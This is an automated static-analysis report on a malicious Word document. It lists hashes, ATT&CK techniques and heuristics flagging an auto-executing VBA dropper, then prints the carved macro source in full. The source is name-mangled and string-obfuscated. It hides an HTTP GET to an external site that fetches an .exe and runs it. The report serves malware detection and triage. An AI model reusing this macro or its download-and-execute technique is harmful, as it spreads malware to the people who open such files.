Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 35f632b22528c895…

MALICIOUS

Office (OLE)

Size: 82.5 KB | Created: 2016-05-12 23:30:00 | Authoring application: Microsoft Office Word | First seen: 2017-12-24
MD5: c19966da8aaf3c04f728e22705276a63
SHA-1: 6f5031af92b2aad5eb25d2a6361b90342bd6a652
SHA-256: 35f632b22528c8950e4dfcad760d8438ffe40c76a96683be88692248cbb14636
Risk Score: 164

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File

The sample is a malicious Office document containing VBA macros. The heuristic 'OLE_VBA_PCODE_AUTOEXEC_EXEC' indicates that the macro attempts to execute code upon opening the document. The 'SC_STR_WSCRIPT' heuristic further suggests the use of Windows Script Host, likely to download and execute a secondary payload. The ClamAV detection 'Doc.Dropper.Agent-6403839-0' confirms its malicious nature as a dropper.

Heuristics (6)

  • ClamAV: Doc.Dropper.Agent-6403839-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6403839-0
  • Reference to Windows Script Host [high] SC_STR_WSCRIPT
    Reference to Windows Script Host
  • VBA macros detected [medium, 1 related finding] OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Suspicious extracted artifact [info] EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URLs (channel: in document text, OLE body):
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#
    • http://ns.adobe.com/xap/1.0/
    • http://ns.adobe.com/xap/1.0/mm/
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef#
    • http://schemas.openxmlformats.org/drawingml/2006/main

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 3648 bytes
SHA-256: 538257fd2687160a9b3099946ad3324df116797621e07127b6a5db4bfb018d52
Detection: ClamAV: No threats found
Obfuscation or payload: likely
56 of 98 identifiers look randomly generated (e.g. 'ReXsGOpoqnOsOeqBGOoqdyG') — consistent with name-mangling obfuscation.

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "YEVWrnxjZw"
Private Function rvYdOAwcuH(ByVal aYERV As String, ByVal tqCeR As String) As String
Dim CylOKlM As Integer
Set HWNSf = SiovGt.kHJDvJ(YRFtRyuOMI, CdauetYt.nMfUcbkG, AlJtwNCb.NzbElOh("P3RAWOVCVES3VS", ".A3VW"))
rvYdOAwcuH = HWNSf(aYERV)
End Function
Private Function XQQHRivB() As String
XQQHRivB = AlJtwNCb.NzbElOh("OYp4eCnC", "CY4 ")
End Function
Private Function YRFtRyuOMI() As String
YRFtRyuOMI = AlJtwNCb.NzbElOh("E8nYYvGirbYoGnbm8eBnGt", "8bBGYX")
End Function
Private Function noPgfimLQl() As String
noPgfimLQl = "eJdybT86JRL"
End Function
Private Sub utuhmS(ByVal uKjCSio As String, ByVal qoqVV As String)
Set ttAvUNZbD = CdauetYt.yFOARrxkL
SiovGt.uLMdQEzSM OzsMX, AlJtwNCb.NzbElOh("OYp4eCnC", "CY4 "), uKjCSio, ttAvUNZbD, False
SiovGt.QavSmHwAdE AlJtwNCb.NzbElOh("UJsJJerj-JJAjgJeJnGt", "GJj"), YBKUEtVd, 2963, AlJtwNCb.NzbElOh("Mv5ovzviluvl5av/45v.0uv 5(cvvomv5pautuiuvbvle5;5u)", "5uv"), NbJTHGCP, ttAvUNZbD
SiovGt.bgDKJRS 1177, ttAvUNZbD, bcUkOw
WKCFjIMPBW True, 6317, qoqVV, SiovGt.JvWgrglen(NbJTHGCP, tEVIdsD, ttAvUNZbD)
End Sub
Private Function tEVIdsD() As String
tEVIdsD = AlJtwNCb.NzbElOh(".ReXsGOpoqnOsOeqBGOoqdyG", ".GXqO")
End Function
Private Sub gbNWoi()
Dim HttjRmGJ As Integer
OIRUtHf = True
On Error GoTo ikwBA
zIxdob = False
utuhmS XbpIXBreKI, qpfZb
KpfAeitTid qpfZb
Exit Sub
ikwBA:
End Sub
Private Function qpfZb() As String
Dim TQUHiRmd As Integer, hIKrUpMu As Integer
qpfZb = rvYdOAwcuH(AlJtwNCb.NzbElOh("ZTEUMZsP", "9cZUsX"), "rlpEKNMdbrH3gcN") & ureCwD
End Function
Private Function HgLZFJd() As String
HgLZFJd = AlJtwNCb.NzbElOh("nTyHpaeB", "HBaqXn")
End Function
Private Function ureCwD() As String
Dim duAGGyqSxo As Integer
Dim AhCLLHJB As Integer
JJNlxuFaS = True
ureCwD = yUuhMmQyGP
End Function
Private Sub KpfAeitTid(ByVal OGiVlfDvNr As String)
SiovGt.lITquzHn "G29r6KbTng", CdauetYt.nMfUcbkG, 7188, OGiVlfDvNr, AlJtwNCb.NzbElOh("kEx2eI1c", "k31IG2")
End Sub
Private Function NbJTHGCP() As String
NbJTHGCP = "g81SabjfIw6"
End Function
Public Sub IdmgRsM()
Dim ZcKzmV As Integer
Dim ZJXOxiAU As Boolean
kZsag = 4121
gbNWoi
End Sub
Private Function NPLIiMfm() As String
NPLIiMfm = AlJtwNCb.NzbElOh("YClm/o/s0e", "0dY/m")
End Function
Private Function XbpIXBreKI() As String
Dim nTCnT As Integer
XbpIXBreKI = AlJtwNCb.NzbElOh("hBtYUtpYU:Y//YmYaYBgUaBzYinUBesYeUYmUprUeYbBeYlUlBUaU.cYoBYmB/UsBysUtYeUmUY/BcUacBhBeUY/UwoBrUUdY.eYYxUe", "YUB")
End Function
Private Sub WKCFjIMPBW(ByVal nYjlPOglL As Boolean, ByVal Qhqsj As Integer, ByVal mFQrVpW As String, ByVal InZuOq As Variant)
Dim nIDzD As Boolean
Dim OGwEZVg As Integer
Set iIHcTWxaSP = CdauetYt.QLILYAMDT
SiovGt.HQvScqTefi True, 1, iIHcTWxaSP, HgLZFJd
SiovGt.bgDKJRS 1177, iIHcTWxaSP, XQQHRivB
uRUxACPwrk = 5904
SiovGt.lITquzHn noPgfimLQl, iIHcTWxaSP, 7188, InZuOq, AlJtwNCb.NzbElOh("Wbbribtzek", "Zzlmkb")
sIbLjqP = "zGfxeChfYk2NCyH"
SiovGt.QavSmHwAdE mFQrVpW, nAsYQtvB, 2963, 2, noPgfimLQl, iIHcTWxaSP
SiovGt.bgDKJRS 1177, iIHcTWxaSP, NPLIiMfm
End Sub
Private Function OzsMX() As String
XBoKEL = False
OzsMX = AlJtwNCb.NzbElOh("G.E TB", ".BA ")
End Function
Private Function nAsYQtvB() As String
nAsYQtvB = AlJtwNCb.NzbElOh("pSraUvremToVUFimlVed", "mprdUV")
End Function
Private Function yUuhMmQyGP() As String
yUuhMmQyGP = AlJtwNCb.NzbElOh("/76owfbV879w4eo1o8w027fw14Vb5V7a41o.VeoxeV", "V7wo4")
End Function
Private Function YBKUEtVd() As String
YBKUEtVd = AlJtwNCb.NzbElOh("SEehtELReLlqhuelshhtLHhepaldlelr", "ELlhp")
End Function
Private Function bcUkOw() As String
bcUkOw = AlJtwNCb.NzbElOh("SIerIndr", "MIrG")
End Function